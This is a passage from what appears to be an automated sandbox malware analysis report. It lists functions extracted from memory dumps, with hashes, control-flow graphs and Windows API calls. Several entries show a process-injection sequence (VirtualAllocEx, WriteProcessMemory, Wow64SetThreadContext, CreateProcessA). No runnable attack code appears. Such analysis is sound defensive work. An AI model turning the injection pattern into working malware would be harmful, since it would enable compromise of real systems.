                                            • Opcode Fuzzy Hash: 5a5b04db8158a8054dc575b6e755e44d08ea9d0fbbe6f1a8bede28e8916240d7
                                            • Instruction Fuzzy Hash: 21A11778D0921DCFDF18DFA8D98069DBBB2BF8A704F24852AD406BB254DB349981CF15
                                            Function 028E1C60 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: at{
                                            • API String ID: 0-3707570843
                                            • Opcode ID: 5c9c28b82ab277629a49af85c451249418577a83c3189cae51bffa9d43bac201
                                            • Instruction ID: e73f3c8a2ba12b597a258db5b48e3e6d6f9090c462c0aae3665fd9a3637d40eb
                                            • Opcode Fuzzy Hash: 5c9c28b82ab277629a49af85c451249418577a83c3189cae51bffa9d43bac201
                                            • Instruction Fuzzy Hash: 395119B8E042099FDF08CFAAC9445AEFBF2EF89310F24D56AD41AE7254D3349941CB65
                                            Function 0A0A5FAF Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: B^
                                            • API String ID: 0-1816219012
                                            • Opcode ID: 05e603ca5e3b813deff87a42a16b0ca11c6dd7885c0ab4c6fe55904d4b599056
                                            • Instruction ID: e19fd604ed6f0d9126d3a1ed2451e6c60e6d6fa32b5d6548a2bf3284a8ecbe51
                                            • Opcode Fuzzy Hash: 05e603ca5e3b813deff87a42a16b0ca11c6dd7885c0ab4c6fe55904d4b599056
                                            • Instruction Fuzzy Hash: 14419AB4D01248DFDB10CFE9C984A9EFBF1AB09300F24942AE814BB250D775A989CF58
                                            Function 0A0A2288 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: B^
                                            • API String ID: 0-1816219012
                                            • Opcode ID: 24b35b5f17b8ead3eb1ab140825bfbe0b2b4288954084b0a2dcbf12e5366e03c
                                            • Instruction ID: 232936fb1667c23ee7b9bf397ff2db6f4cc70c9a7ab6220c881f6ada69a45273
                                            • Opcode Fuzzy Hash: 24b35b5f17b8ead3eb1ab140825bfbe0b2b4288954084b0a2dcbf12e5366e03c
                                            • Instruction Fuzzy Hash: DB419AB4D01208DFDB20CFE9C984A9EFBF0EB19300F24942AE914BB250D775A948CF58
                                            Function 028E2698 Relevance: .1, Instructions: 82COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be1274d0f4fa25bda18b10efcc33dfece44ea9c06aecb74cc8fa076da1f58090
                                            • Instruction ID: 162f45964cc738569a7c3e6af291cc5b716524818d724daa973dcb68c80396dd
                                            • Opcode Fuzzy Hash: be1274d0f4fa25bda18b10efcc33dfece44ea9c06aecb74cc8fa076da1f58090
                                            • Instruction Fuzzy Hash: 68312BB5E052588FDB18CFA6D8446DEBBB2EFC9310F14C1AAD409AB264DB754949CF40
                                            Function 028E0878 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b429598acd276c6a536024a98d0085b9285e46f6139518002f44db77cc4744f2
                                            • Instruction ID: 158f59e43ee5866fc497905908999c597e6cf5231189f45c76ac1b912b61232d
                                            • Opcode Fuzzy Hash: b429598acd276c6a536024a98d0085b9285e46f6139518002f44db77cc4744f2
                                            • Instruction Fuzzy Hash: 89210A75E046188BEB18CF6BDC4079EBAF3BFC9200F04C5BAC51DA6264EB3409458F51
                                            Function 0998A92B Relevance: .0, Instructions: 8COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d88ae22f25c73613921d1e12c6febd4e044b5d37038497e86a7f26bf16c36c17
                                            • Instruction ID: 69fa7afc6d71e118c623f2a41801f7449b567dbc91f0c1c230b45034e357db40
                                            • Opcode Fuzzy Hash: d88ae22f25c73613921d1e12c6febd4e044b5d37038497e86a7f26bf16c36c17
                                            • Instruction Fuzzy Hash: E3A00245C8F0048080403C1100941B7C03D165B694E447C4E901A3740A0405C080003C
                                            Function 029A79C8 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1851 29a79c8-29a7a67 GetCurrentProcess 1855 29a7a69-29a7a6f 1851->1855 1856 29a7a70-29a7aa4 GetCurrentThread 1851->1856 1855->1856 1857 29a7aad-29a7ae1 GetCurrentProcess 1856->1857 1858 29a7aa6-29a7aac 1856->1858 1860 29a7aea-29a7b05 call 29a7ba7 1857->1860 1861 29a7ae3-29a7ae9 1857->1861 1858->1857 1864 29a7b0b-29a7b3a GetCurrentThreadId 1860->1864 1861->1860 1865 29a7b3c-29a7b42 1864->1865 1866 29a7b43-29a7ba5 1864->1866 1865->1866
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 029A7A56
                                            • GetCurrentThread.KERNEL32 ref: 029A7A93
                                            • GetCurrentProcess.KERNEL32 ref: 029A7AD0
                                            • GetCurrentThreadId.KERNEL32 ref: 029A7B29
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: cd9d9628e1e965053d06cfd8eafe8b728496d1c182bd98f1ab478400f150f8d6
                                            • Instruction ID: 0f807a23f1dcc8c17d4cb0b63d8306d2fe188a8244c0ca363e83feebcc2a06d5
                                            • Opcode Fuzzy Hash: cd9d9628e1e965053d06cfd8eafe8b728496d1c182bd98f1ab478400f150f8d6
                                            • Instruction Fuzzy Hash: 585165B0A043099FDB54CFA9DA48BEEFBF1EF88314F24845AE409A7261DB345944CB65
                                            Function 029A79D8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1873 29a79d8-29a7a67 GetCurrentProcess 1877 29a7a69-29a7a6f 1873->1877 1878 29a7a70-29a7aa4 GetCurrentThread 1873->1878 1877->1878 1879 29a7aad-29a7ae1 GetCurrentProcess 1878->1879 1880 29a7aa6-29a7aac 1878->1880 1882 29a7aea-29a7b05 call 29a7ba7 1879->1882 1883 29a7ae3-29a7ae9 1879->1883 1880->1879 1886 29a7b0b-29a7b3a GetCurrentThreadId 1882->1886 1883->1882 1887 29a7b3c-29a7b42 1886->1887 1888 29a7b43-29a7ba5 1886->1888 1887->1888
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 029A7A56
                                            • GetCurrentThread.KERNEL32 ref: 029A7A93
                                            • GetCurrentProcess.KERNEL32 ref: 029A7AD0
                                            • GetCurrentThreadId.KERNEL32 ref: 029A7B29
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 97f3fa98a649291d9dc456e5ff84a3ef927ede9beeb42abd731aa235b79361d9
                                            • Instruction ID: 6623296c9baeb83fbe97c48de435d31db3cfbc587175b41fbc15aa40cae8000a
                                            • Opcode Fuzzy Hash: 97f3fa98a649291d9dc456e5ff84a3ef927ede9beeb42abd731aa235b79361d9
                                            • Instruction Fuzzy Hash: 335135B09003099FDB54CFAADA48BEEFBF5EF88314F248459E419A7350DB345944CB65
                                            Function 028E81FA Relevance: 1.9, APIs: 1, Instructions: 435memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 028E831F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 08237c859f14963a72eea655718200674398e83cefbe15903e4dcc5bfb7ecde2
                                            • Instruction ID: d971dad47b632199c8682f394b86cea5ee77ea95e6164fffd462b27f8be434da
                                            • Opcode Fuzzy Hash: 08237c859f14963a72eea655718200674398e83cefbe15903e4dcc5bfb7ecde2
                                            • Instruction Fuzzy Hash: EEE1BE6D944985DBCF128FA4C4A15D9FFB0FF1B715B1809DDC4D19B222EB325886CB90
                                            Function 099877CE Relevance: 1.8, APIs: 1, Instructions: 324processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09987A9F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 009a6935281f1b84b793cfe6a51503ff819cc0a0a0ff3629a066f351bf12bcf4
                                            • Instruction ID: 3476f67691f06d411e5592aea3108d7c3e5dd75b48288d264e0dd002c055d85d
                                            • Opcode Fuzzy Hash: 009a6935281f1b84b793cfe6a51503ff819cc0a0a0ff3629a066f351bf12bcf4
                                            • Instruction Fuzzy Hash: 01C12871D002198FDF24DFA8C881BEEBBB5BF49300F1495A9E859B7250DB749A85CF90
                                            Function 099877D8 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09987A9F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: c99575ce52dcad3996f9c26206a79f5e9efc1c9ce44b920d4042711a12383813
                                            • Instruction ID: 11d8660fd4e172c4938f1f24a352ddf42a894773543dc6169fd420b04c764b4a
                                            • Opcode Fuzzy Hash: c99575ce52dcad3996f9c26206a79f5e9efc1c9ce44b920d4042711a12383813
                                            • Instruction Fuzzy Hash: 9EC12771D002198FDF20DFA8C841BEEBBB5BF49300F1495A9E859B7250DB749A85CF91
                                            Function 029A55F0 Relevance: 1.7, APIs: 1, Instructions: 225COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(?), ref: 029A5872
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 338b76d1b450603065d30544a087688f00d64bfef766d26a643661b603468e59
                                            • Instruction ID: ed1674f618693551d6d905b2f10b01e87c3f3c2f3ed081651baa7a413f53922f
                                            • Opcode Fuzzy Hash: 338b76d1b450603065d30544a087688f00d64bfef766d26a643661b603468e59
                                            • Instruction Fuzzy Hash: 909111B0E00B098FDB64DF69D454BAABBF5FF88304F14892AE44AE7650D770E945CB90
                                            Function 029AC2C4 Relevance: 1.7, APIs: 1, Instructions: 189COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 029AC491
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: c905b501fa2dbce3c823112b01552b6357a05c0126efef4809b77904256cc8d2
                                            • Instruction ID: b578a8f6c5f525bc78c5bf48e8d952fbe2968afa47c64708cd9abbd0cb6ef58d
                                            • Opcode Fuzzy Hash: c905b501fa2dbce3c823112b01552b6357a05c0126efef4809b77904256cc8d2
                                            • Instruction Fuzzy Hash: D1718BB4D04218DFDF21CFA9D984ADDBBF1BB0A310F1491AAE808AB211D730A985CF55
                                            Function 029AC2D0 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 029AC491
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 46b7ab9025bdc80cc95b782e25cc00f9a76a494509bde2d6345998265b7a37fb
                                            • Instruction ID: 28f5a33ec65563e29d4519e9c392edfd9e2833a534d53e0078497654b0cdf7dc
                                            • Opcode Fuzzy Hash: 46b7ab9025bdc80cc95b782e25cc00f9a76a494509bde2d6345998265b7a37fb
                                            • Instruction Fuzzy Hash: A7717BB4D04318DFDF20CFA9D984ADDBBF1BB09314F1491AAE818AB211D770AA85CF54
                                            Function 099426E0 Relevance: 1.6, APIs: 1, Instructions: 146windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateIconFromResourceEx.USER32 ref: 099427F3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191264997.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9940000_file.jbxd
                                            Similarity
                                            • API ID: CreateFromIconResource
                                            • String ID:
                                            • API String ID: 3668623891-0
                                            • Opcode ID: da5f6d50d1fcd62cf7f1fddf1b91aa891a6824fd6d05ef41e8777e2ea5932b93
                                            • Instruction ID: f62d739fd85ad83c3d1171c6a699b45acc9741207a6f3d78f2834da9ee13ba38
                                            • Opcode Fuzzy Hash: da5f6d50d1fcd62cf7f1fddf1b91aa891a6824fd6d05ef41e8777e2ea5932b93
                                            • Instruction Fuzzy Hash: E651DBB5D042589FCF01CFA9D880AAEBFF5FF1A310F14906AE914AB221C335A951DF64
                                            Function 028EE404 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 028EF9E1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 2a54748163c6f383e612417bbe944dab637bc335e062f8ca0e8587fffc0dca1a
                                            • Instruction ID: 92908184869c0436733c5cc0122fe3fb0cbfaa898d49a534026d2223a8fb3db5
                                            • Opcode Fuzzy Hash: 2a54748163c6f383e612417bbe944dab637bc335e062f8ca0e8587fffc0dca1a
                                            • Instruction Fuzzy Hash: 8251C3B5D0021D8FDB21DFA8C840B9EBBF5EF59304F1084AAD509AB251DA716A89CF91
                                            Function 09987448 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09987523
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 74f8a9299f5b52fe4b6b65075001d7784769a854bb5baf88eccb605fd9463be2
                                            • Instruction ID: a283e5ec0dd18339eec21f385ca0424139195a45d68618bc84f0cad669c6b15a
                                            • Opcode Fuzzy Hash: 74f8a9299f5b52fe4b6b65075001d7784769a854bb5baf88eccb605fd9463be2
                                            • Instruction Fuzzy Hash: 8F41AAB5D012589FCF00CFA9D984AEEFBF1BB49310F24942AE819B7210C735AA45CF64
                                            Function 09987450 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09987523
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 57966e4b549603ca9071629ddd30973a77eb67e3544e5476c3f7ac2138428ce5
                                            • Instruction ID: 4ba904792910a51356c8a427f8734ee26edfd01d45f4a53297b4f9529632494f
                                            • Opcode Fuzzy Hash: 57966e4b549603ca9071629ddd30973a77eb67e3544e5476c3f7ac2138428ce5
                                            • Instruction Fuzzy Hash: E84199B5D012589FCF00CFA9D984AEEFBF1BB49310F24942AE818B7250D735AA45CF64
                                            Function 029A7C18 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029A7CEB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 982caca295843eccce4d4089d3eacb6b0e89640b55728f7226cb066fd7afbf83
                                            • Instruction ID: 30cf6aa74c787b1cbd1110055de15caca40621973e710819538b1cfaf22dbe5b
                                            • Opcode Fuzzy Hash: 982caca295843eccce4d4089d3eacb6b0e89640b55728f7226cb066fd7afbf83
                                            • Instruction Fuzzy Hash: C74179B9D002589FCB01CFA9D985AEEFBF5FB09310F14946AE918AB310D335A945CF94
                                            Function 099875A0 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0998765A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: db8ce796e89256c9bc692b0384152cbf88b2d00d14494de8f89323751ad23f87
                                            • Instruction ID: fb8bdd5b4059c11e561d6f39dda3c3043927304b67e69d8e42c1946de02847f7
                                            • Opcode Fuzzy Hash: db8ce796e89256c9bc692b0384152cbf88b2d00d14494de8f89323751ad23f87
                                            • Instruction Fuzzy Hash: 7D41A7B5D002599FCF10CFA9D884AEEFBB1BB59310F14942AE819B7250C735A946CF64
                                            Function 029A7C20 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029A7CEB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: cf278016359da79054d80f36f6ea8facef5451cf5c69ea29de94f07d7180d8a8
                                            • Instruction ID: 37be11ed54b44fc3157e4ef7f35e1f3dbeb55a7815f59d39d1e9f335261db1be
                                            • Opcode Fuzzy Hash: cf278016359da79054d80f36f6ea8facef5451cf5c69ea29de94f07d7180d8a8
                                            • Instruction Fuzzy Hash: 594165B9D002589FCF00CFA9D984ADEFBF5BB09310F14906AE918AB310D335A945CFA4
                                            Function 099875A8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0998765A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 01ec3581421ec398240387ec6aa4baaaa8c559f17574f1553f64bc831b7968af
                                            • Instruction ID: 6b73de9c162cd23bb986e3a75a74407c537d2cdabea4b021db0aa2477e1e9e46
                                            • Opcode Fuzzy Hash: 01ec3581421ec398240387ec6aa4baaaa8c559f17574f1553f64bc831b7968af
                                            • Instruction Fuzzy Hash: A541A9B5D042589FCF10CFAAD884AEEFBB5BB59310F14942AE819B7200C735A945CF68
                                            Function 09987328 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 099873DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 352d5a0c2c33af046c7580ef9db2da3dd7fae491547aa5edb87fe908278c36b2
                                            • Instruction ID: f4aeabc805bab5463841a608579a542e00161041d7bc465dc0bc24430ef3b8a0
                                            • Opcode Fuzzy Hash: 352d5a0c2c33af046c7580ef9db2da3dd7fae491547aa5edb87fe908278c36b2
                                            • Instruction Fuzzy Hash: 0231BAB5D042589FCF10CFA9E884AEEFBB1FB59310F20942AE815B7250D735A946CF64
                                            Function 09987330 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 099873DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 54b22519dc81fb266284d06a48a535eb5e34df8810b42f5948d31efc6e9c65e8
                                            • Instruction ID: 69b83ed6881379321b4ac258b3a425164c1a1488a89851112499ec15b30489fe
                                            • Opcode Fuzzy Hash: 54b22519dc81fb266284d06a48a535eb5e34df8810b42f5948d31efc6e9c65e8
                                            • Instruction Fuzzy Hash: DD31AAB9D002589FCF10CFA9D980ADEFBB5FB59310F10942AE814B7200D735A946CF64
                                            Function 028E81EA Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 028E831F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: fa823dd72183c2b13defdb6dc43dd34dc9d6c66385f627693dd33e5a0caeea73
                                            • Instruction ID: 0927ca53384246f48f05d8867a52217616c86d44ca1694dd28be8f72a3cc414a
                                            • Opcode Fuzzy Hash: fa823dd72183c2b13defdb6dc43dd34dc9d6c66385f627693dd33e5a0caeea73
                                            • Instruction Fuzzy Hash: B741A9B9D042589FCF10CFA9D984AEEFBB1BB1A310F14905AE815B7220D375A945CF64
                                            Function 029AB154 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 029AEB01
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 4843d777f4f382409058b552d076aaf4fabd119b525a363448f2791d0cb2241c
                                            • Instruction ID: 0c6ee19a865211a9c057d8034323b0631e1f4882866e913140847ac999904fa7
                                            • Opcode Fuzzy Hash: 4843d777f4f382409058b552d076aaf4fabd119b525a363448f2791d0cb2241c
                                            • Instruction Fuzzy Hash: 944119B5A00305CFCB14CF99C898AAABBF5FF88314F25C859D559A7321D735A841CFA0
                                            Function 09987200 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 099872B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 5ecd7b23779b6904ce2f790715283d4fd2fedfb919a494b6804c784f50480a38
                                            • Instruction ID: 129e0865a6b6e1cbf8a8058f0ddfc29c553eb5109b3ea854dd139be83834f0d7
                                            • Opcode Fuzzy Hash: 5ecd7b23779b6904ce2f790715283d4fd2fedfb919a494b6804c784f50480a38
                                            • Instruction Fuzzy Hash: 2C41BCB5D012589FCB10DFA9D884AEEBFF1BF59310F24842AE414B7250C7385945CF64
                                            Function 028E8278 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 028E831F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 801b9f6ac65b810c5ae3d5e529181634e6dcb3bb6c5b448778802922bd1995e4
                                            • Instruction ID: 92e88d7ede0d620838193ec2877268ffa4e8e3cae739a07d4a05da572cb8a18d
